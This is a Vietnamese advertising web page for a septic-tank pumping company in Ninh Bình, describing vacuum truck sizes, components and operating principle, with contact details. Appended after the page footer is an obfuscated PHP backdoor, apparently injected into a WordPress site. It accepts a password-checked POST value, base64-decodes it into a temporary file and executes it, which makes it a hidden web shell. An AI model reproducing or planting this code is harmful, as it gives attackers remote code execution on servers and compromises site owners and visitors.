Tìm hiểu về hút bể phốt Ninh Bình

hút bể phốt ninh bình

Công việc hút bể phốt là sự kết hợp giữa nhiều yếu tố khác nhau bao gồm con người, máy móc, thiết bị và không thể thiếu được chiếc xe hút bể phốt. Nó chính là phương tiện chính để chứa chất thải và di chuyển chất thải đến vị trí xử lý. Vậy các bạn đã biết gì về loại xe chuyên dụng này, ngay sau đây chúng ta cùng tìm hiểu về xe hút bể phốt Ninh Bình trong bài viết của Hutbephot-urenco.com nhé.

Những thông tin cơ bản về xe hút bể phốt Ninh Bình

Các loại xe hút bể phốt tại Tam Điệp Ninh Bình phổ biến

Dịch vụ hút bể phốt tại Tam Điệp Ninh Bình có các loại xe chuyên dụng với kích cỡ thể tích từ nhỏ đến lớn phù hợp cho nhiều loại bể phốt khác nhau:

+ Đầu tiên là xe hút bể phốt nhỏ nhất khoảng từ 0,8 đến 1 khối

+ Tiếp theo phải kể đến xe hút bể phốt cỡ nhỏ có thể tích từ 3 đến 5 khối

+ Tiếp đến là xe hút bể phốt cỡ vừa với dung tích từ 6 đến 8 khối

+ Kế nữa là xe hút bể phốt Ninh Bình cỡ lớn từ 15 đến 30 khối

+ Sau cùng là xe kích cỡ to với thể tích trên 40 khối

Các loại xe này đều sử dụng  công nghệ chân không của Nhật Bản hiện đại và tiên tiến nhất hiện nay. Với các dòng xe hút bể phốt Ninh Bình có kích cỡ nhỏ, vừa thường sử dụng cho các hộ gia vì có kích thước bể phốt không quá lớn. Đối với các dòng xe có kích thước lớn và cỡ to sẽ phù hợp cho các trường học, bệnh viện, doanh nghiệp, tổ chức…

Xem thêm: Tìm hiểu về dịch vụ hút bể phốt Lạng Sơn

Cấu tạo xe hút bể phốt Ninh Bình

Xe hút bể phốt Ninh Bình và tất cả các loại xe hút bể phốt khác thường có cấu tạo với 2 phần: Phần đầu xe thiết kế giống như các loại xe tải khác. Phần sau là hệ thống bồn chuyên dụng với nhiều bộ phận như:

+Bơm chân không áp lực lớn dùng để hút chất thải, hút bể phốt

+ Đồng hồ đo áp suất chân không trong quá trình hút

+ Bộ power take off: bộ truyền lực để vận hành bơm, còn thường để lắp đặt trên xe chở nhiên liệu hoặc phun nước.

+ Trục truyền động

+ Máy phân lý

+ Téc

+ Van thải

+ Cửa nhìn chất thải

+ Hệ thống ống dẫn chất thải

+ Hệ thống thủy lực

+ Thiết bị rửa tay

Mỗi bộ phận của bồn chuyên dụng có những công năng riêng và cùng kết hợp với nhau để tạo nên chiếc xe hút bể phốt Ninh Bình chất lượng tốt nhất.

Xem thêm: Dịch vụ hút bể phốt tại Hải Dương giá rẻ, bảo hành dài hạn

Nguyên lý hoạt động và lợi ích khi sử dụng xe hút bể phốt Ninh Bình.

Nguyên lý hoạt động

Xe hút bể phốt Ninh Bình chuyên dụng hoạt động theo nguyên lý hút chân không. Bộ phận bơm chân không được đặt cạnh bể phốt,  tạo áp lực lớn hút chất thải lên, làm sạch bể phốt.

Bơm hút chân không có tác dụng hút toàn bộ hết không khí trong téc ra tạo nên lực hút cực mạnh. Nhờ đó mà hút hết các chất thải lên trong bể phốt lên. Lực hút mạnh hay nhẹ sẽ dựa trên chiều dài xa hay gần cùng công suất và thể tích téc chứa lớn hay nhỏ. Xe bồn càng lớn thì công suất càng mạnh, chiều dài càng ngắn thì lực hút càng lớn.

hút bể phốt ninh bình
hút bể phốt ninh bình

Đánh giá hút bể phốt tại Ninh Bình 663 lợi ích mang lại

Nhu cầu sử dụng dịch vụ hút bể phốt, chất thải đang ngày càng có xu hướng tăng lên. Nhằm giải phóng hầm chứa đảm bảo quá trình lưu thông nước thải luôn ổn định. Cũng vì vậy mà cần những phương tiện xử lý nhanh, trọn gói để đáp ứng công việc cấp thiết này. Sử dụng xe chuyên dụng để hút bể phốt Ninh Bình giúp cho công việc trở nên nhanh chóng, thuận tiện hơn.

Xem thêm: Dịch vụ hút bể phốt tại hà nội của chúng tôi

Đánh giá hút bể phốt tại Ninh Bình 663 có công nghệ hút chân không nên có lực hút cực kỳ mạnh có thể hút sạch mọi chất thải trong bể phốt.

Xe chuyên dụng  giúp công việc hút bể phốt gói gọn hơn, tất cả các công đoạn đều được xử lý một cách chuyên nghiệp, tiện lợi. Nó là phương tiện cần thiết hỗ trợ quá trình hút bể phốt giúp tiết kiệm thời gian, công sức cho cả người  thợ thi công và người thuê dịch vụ.

Công ty TNHH phát triển dịch vụ vệ sinh môi trường Việt Nam có đầy đủ các loại xe hút bể phốt Ninh Bình có thể đáp ứng theo mọi yêu cầu của khách hàng. Khi quý khách cần hãy gọi ngay cho chúng tôi:

Công ty TNHH phát triển dịch vụ vệ sinh môi trường Việt Nam

Địa chỉ: 560 Âu Cơ – Tây Hồ – Hà Nội

Điện thoại: 0986 594 594

Email: hutbephoturenco@gmail.com

Website: https://hutbephot-urenco.com/

Nguyễn Ngọc Hải

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Gọi Ngay

Contact Me on Zalo
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}